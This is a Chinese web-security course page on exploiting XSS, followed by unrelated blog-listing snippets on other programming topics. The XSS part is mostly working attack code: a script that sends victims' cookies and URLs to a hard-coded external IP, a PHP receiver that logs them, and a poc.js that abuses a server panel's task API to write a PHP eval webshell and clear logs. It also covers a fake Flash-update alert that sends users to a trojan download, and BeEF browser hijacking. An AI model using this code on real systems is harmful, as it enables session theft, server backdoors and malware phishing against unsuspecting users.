当前位置：首页 > news >正文

Day54：WEB攻防-XSS跨站Cookie盗取表单劫持网络钓鱼溯源分析项目平台框架

news 2025/8/26 19:39:40

XSS跨站-攻击利用-凭据盗取

XSS跨站-攻击利用-数据提交

XSS跨站-攻击利用-flash钓鱼

XSS跨站-攻击利用-溯源综合

知识点：

1、XSS跨站-攻击利用-凭据盗取

2、XSS跨站-攻击利用-数据提交

3、XSS跨站-攻击利用-网络钓鱼

4、XSS跨站-攻击利用-溯源综合

漏洞原理：接受输入数据，输出显示数据后解析执行

基础类型：反射(非持续)，存储(持续)，DOM-BASE

拓展类型：jquery，mxss，uxss，pdfxss，flashxss，上传xss等

常用标签：https://www.freebuf.com/articles/web/340080.html

攻击利用：盲打，COOKIE盗取，凭据窃取，页面劫持，网络钓鱼，权限维持等

安全修复：字符过滤，实例化编码，http_only，CSP防护，WAF拦截等

测试流程：看输出想输入在哪里，更改输入代码看执行（标签，过滤决定）

XSS跨站-攻击利用-凭据盗取

条件：无防护Cookie凭据获取

把该XSS源码放到外网服务器上运行

登录前台测试账号

当用户申请提现时，管理员后台是能看到一些申请体现信息，这时候就会产生XSS漏洞

成功进入后台

触发代码

<script>var url='http://47.94.236.117/getcookie.php?u='+window.location.href+'&c='+document.cookie;document.write("<img src="+url+" />");</script>

47.94.236.117服务器上写一个getcookie.php脚本
接受：

<?php
$url=$_GET['u'];
$cookie=$_GET['c'];
$fp = fopen('cookie.txt',"a");
fwrite($fp,$url."|".$cookie."\n");
fclose($fp);
?>

XSS跨站-攻击利用-数据提交

条件：熟悉后台业务功能数据包，利用JS写一个模拟提交
利用：凭据获取不到或有防护无法利用凭据进入时执行其他
payload:

<script src="http://xx.xxx.xxx/poc.js"></script>

poc.js //要放在外网服务器WEB目录下，这个代码专门针对小皮面板写的

function poc(){js$.get('/service/app/tasks.php?type=task_list',{},function(data){var id=data.data[0].ID;$.post('/service/app/tasks.php?type=exec_task',{tid:id},function(res2){$.post('/service/app/log.php?type=clearlog',{},function(res3){},"json");},"json");},"json");
}
function save(){var data=new Object();data.task_id="";data.title="test";data.exec_cycle="1";data.week="1";data.day="3";data.hour="14";data.minute = "20";data.shell='echo "<?php @eval($_POST[123]);?>" >C:/xp.cn/www/wwwroot/admin/localhost_80/wwwroot/1.php';$.post('/service/app/tasks.php?type=save_shell',data,function(res){poc();},'json');
}
save();

管理员登陆后查看日志触发

XSS跨站-攻击利用-flash钓鱼

部署可访问的钓鱼页面并修改

点击立即下载后，就会下载木马文件

植入XSS代码等待受害者触发

<script>alert('当前浏览器Flash版本过低，请下载升级！');location.href='http://x.x.x.x/flash'</script>

点击确定后就会来到准备好的钓鱼页面，立即下载地址就可以填木马地址

项目地址：https://github.com/r00tSe7en/Fake-flash.cn

XSS跨站-攻击利用-溯源综合

XSS数据平台-XSSReceiver(这是给个人搭建的XSS平台，不想使用网上的XSS平台可以用这个项目)

简单配置即可使用，无需数据库，无需其他组件支持
项目地址：https://github.com/epoch99/BlueLotus_XSSReceiver-master
搭建非常简单，下载源码下来放入phpstudy目录下访问安装即可

浏览器控制框架-beef-xss

只需执行JS文件，即可实现对当前浏览器的控制，可配合各类手法利用
缺点：如果对方浏览器关闭，权限就会掉
搭建：docker run --rm -p 3000:3000 janes/beef //安装命令

这个代码插入到网站首页html里，这样当别人访问这个首页文件就会被劫持

Day54：WEB攻防-XSS跨站Cookie盗取表单劫持网络钓鱼溯源分析项目平台框架

目录 XSS跨站-攻击利用-凭据盗取 XSS跨站-攻击利用-数据提交 XSS跨站-攻击利用-flash钓鱼 XSS跨站-攻击利用-溯源综合知识点： 1、XSS跨站-攻击利用-凭据盗取 2、XSS跨站-攻击利用-数据提交 3、XSS跨站-攻击利用-网络钓鱼 4、XSS跨站-攻击利用-溯源综合漏洞原理…...

编程日记 2024/4/2 4:04:00

2024年MathorCup数学建模思路C题思路分享

文章目录 1 赛题思路2 比赛日期和时间3 组织机构4 建模常见问题类型4.1 分类问题4.2 优化问题4.3 预测问题4.4 评价问题 5 建模资料 1 赛题思路 (赛题出来以后第一时间在CSDN分享) https://blog.csdn.net/dc_sinor?typeblog 2 比赛日期和时间报名截止时间：2024…...

编程日记 2024/4/2 4:01:58

HCIP作业

实验要求： 1、R6为ISP，接口IP地址均为公有地址，该设备只能配置IP地址，之后不能再对其进行任何配置； 2、R1-R5为局域网，私有IP地址192.168.1.0/24，请合理分配； 3、R1、R2、R4&#x…...

编程日记 2024/4/2 4:00:57

如何向sql中插入数据-接上一篇《MySQL数据库的下载和安装以及命令行语法学习》续

接上一篇《MySQL数据库的下载和安装以及命令行语法学习》续https://blog.csdn.net/tiger_web0/article/details/136903805 在SQL中，要向表中添加数据，您通常使用INSERT INTO语句。以下是如何使用INSERT INTO语句的基本格式和示例： 基本格式…...

编程日记 2024/4/2 3:58:54

简单的HTML

1.HTML介绍 HTML(HyperText Markup Language,超文本标记语言)是用于创建网页的标准标记语言。它使用一系列的元素来描述网页的结构和内容,包括文本、图像、链接、表格等。 1.1HTML基础结构 HTML文件是一种纯文本文件,由一系列的元素构成。每个元素由一对尖括号<>包围,…...

编程日记 2024/4/2 3:57:54

2024最新 maven 高级用法（概念自己百度）

#B站看视频学不到的知识# 目录 maven 定义和概念 maven是java构建工具。maven通过远程仓库获取和更新jar包，通过坐标来管理jar文件。 maven核心配置文件 config目录下settings.xml 文件，核心配置详解： localRepository 本地仓库地址&…...

编程日记 2024/4/2 3:56:52

【C++】每日一题 12 整数转罗马数字

罗马数字包含以下七种字符： I， V， X， L，C，D 和 M。字符数值 I 1 V 5 X 10 L 50 C 100 D 500 M 1000 例如， 罗马数字 2 写做 II ，即为两个并列的 1。12 写做 XII ，即为…...

编程日记 2024/4/2 3:55:51

C++学习建议

C是一门强大且广泛应用的编程语言，特别适合系统级开发、高性能应用和游戏引擎等场景。如果你准备深入学习C，以下是一些关键点和学习路径建议： 1. **基础语法**：首先掌握C的基础语法，如变量声明与赋值、数据类型、运算…...

编程日记 2024/4/2 3:53:49

python实现泊松回归

1 什么是基于计数的数据？ 基于计数的数据包含以特定速率发生的事件。发生率可能会随着时间的推移或从一次观察到下一次观察而发生变化。以下是基于计数的数据的一些示例： 每小时穿过十字路口的车辆数量每月去看医生的人数每月发现的类地行星数量计数数…...

编程日记 2024/4/2 3:52:49

软件测试-进阶篇

目录测试的分类1 按测试对象划分1.1 界面测试1.2 可靠性测试1.3 容错性测试1.4 文档测试1.5 兼容性测试1.6 易用性测试1.7 安装卸载测试1.8 安装测试1.9 性能测试1.10 内存泄漏测试 2 按是否查看代码划分2.1 黑盒测试（Black-box Testing）2.2 白盒测试&a…...

编程日记 2024/4/2 3:50:47

Google人才选拔的独特视角

Google人才选拔的独特视角独特的人才选拔标准 Google作为全球最大的搜索引擎公司，拥有无数优秀的人才。他们的选拔标准与众不同，有着自己独特的人才观。重视多元化的背景 Google相信人才的多元化背景能够给公司带来不同的思考角度和创新思维。他们…...

编程日记 2024/4/2 3:48:45

OSPF---开放式最短路径优先协议

1. OSPF描述 OSPF协议是一种链路状态协议。每个路由器负责发现、维护与邻居的关系，并将已知的邻居列表和链路费用LSU报文描述，通过可靠的泛洪与自治系统AS内的其他路由器周期性交互，学习到整个自治系统的网络拓扑结构;并通过自治系统边界的路…...

编程日记 2024/4/2 3:47:44

云数据仓库Snowflake论文完整版解读

本文是对于Snowflake论文的一个完整版解读，对于从事大数据数据仓库开发，数据湖开发的读者来说，这是一篇必须要详细了解和阅读的内容，通过全文你会发现整个数据湖设计的起初原因以及从各个维度（架构设计、存算分离、弹性…...

编程日记 2024/4/2 3:43:41

Redis中是如何初始化服务器的?

初始化服务器一个Redis服务器从启动到能够接受客户端的命令请求，需要经过一系列的初始化和设置过程，比如初始化服务器状态，接受用户指定的服务器配置，创建相应的数据结构和网络连接等等初始化服务器状态结构初始化服务器的第…...

编程日记 2024/4/2 3:40:37

深度学习训练过程中，常见的关键参数和概念讲解

深度学习训练过程中的关键参数和概念对于构建、理解和优化模型至关重要。以下是一些最常见的参数和概念，以及它们的简要解释： 1. 学习率（Learning Rate） 学习率是优化算法中最重要的参数之一，它控制着权重调整的幅度…...

编程日记 2024/4/2 3:37:34

如何提高小红书笔记的收录率？

在小红书平台上，笔记的收录率是衡量一篇笔记是否受欢迎和有价值的重要因素。为了提高笔记的收录率，有几个关键点需要注意： 1.内容不涉及广告在发布笔记前要先确保笔记内容不包含任何形式的广告或推广信息。小红书平台对于广告性质的内容有…...

编程日记 2024/4/2 3:35:31

思通数科：利用开源AI能力引擎平台打造企业智能搜索系统

在信息爆炸的时代，如何高效地管理和检索海量数据已成为企业和个人面临的一大挑战。思通数科 StoneDT 多模态AI能力引擎平台，以其强大的自然语言处理（NLP）、OCR识别、图像识别和文本抽取技术，为用户带来了前所未有的智能…...

编程日记 2024/4/2 3:31:27

Nginx配置其实很简单

Nginx配置其实很简单不管作为前端还是后端，我们工作中或多或少得接触反向代理，比如代理静态页面或者文件、代理接口解决跨域、配置https、配置缓存和负载等等。而这些需求的实现，我们肯定能接触到Nginx，即使我们使用Caddy等等其它代理方式，但也肯定知道Nginx的存在。如果…...

编程日记 2024/4/2 3:25:22

Redis中的serverCron函数(一)

serverCron函数 Redis服务器中的serverCron函数默认每隔100毫秒执行一次，这个函数负责管理服务器的资源，并保持服务器自身的良好运转。更新服务器时间缓存 Redis服务器中有不少功能需要获取系统的当前时间，而每次获取系统的当前时间都需要…...

编程日记 2024/4/2 3:24:21

python保存中间变量（学习笔记）

python保存中间变量原因： 最近在部署dust3r算法，虽然在本地部署了，也能测试出一定的结果，但是发现无法跑很多图片，为了能够测试多张图片跑出来的模型，于是就在打算在autodl上部署算法，但是由…...

编程日记 2024/4/2 3:23:20

Linux应用开发之网络套接字编程(实例篇)

服务端与客户端单连接服务端代码 #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <arpa/inet.h> #include <pthread.h> …...

编程新知 2025/8/25 16:11:07

Linux链表操作全解析

Linux C语言链表深度解析与实战技巧一、链表基础概念与内核链表优势1.1 为什么使用链表？1.2 Linux 内核链表与用户态链表的区别二、内核链表结构与宏解析常用宏/函数三、内核链表的优点四、用户态链表示例五、双向循环链表在内核中的实现优势5.1 插入效率5.2 安全…...

编程新知 2025/6/21 5:31:03

RocketMQ延迟消息机制

两种延迟消息 RocketMQ中提供了两种延迟消息机制指定固定的延迟级别通过在Message中设定一个MessageDelayLevel参数，对应18个预设的延迟级别指定时间点的延迟级别通过在Message中设定一个DeliverTimeMS指定一个Long类型表示的具体时间点。到了时间点后&#xf…...

编程新知 2025/8/5 7:03:28

React hook之useRef

React useRef 详解 useRef 是 React 提供的一个 Hook，用于在函数组件中创建可变的引用对象。它在 React 开发中有多种重要用途，下面我将全面详细地介绍它的特性和用法。基本概念 1. 创建 ref const refContainer useRef(initialValue);initialValu…...

编程新知 2025/6/11 15:21:26

1、泄露代码示例 void X::SetApplicationBtn() {CMFCRibbonApplicationButton* pBtn GetApplicationButton();// 获取 Ribbon Bar 指针// 创建自定义按钮CCustomRibbonAppButton* pCustomButton new CCustomRibbonAppButton();pCustomButton->SetImage(IDB_BITMAP_Jdp26)…...

编程新知 2025/8/22 3:28:33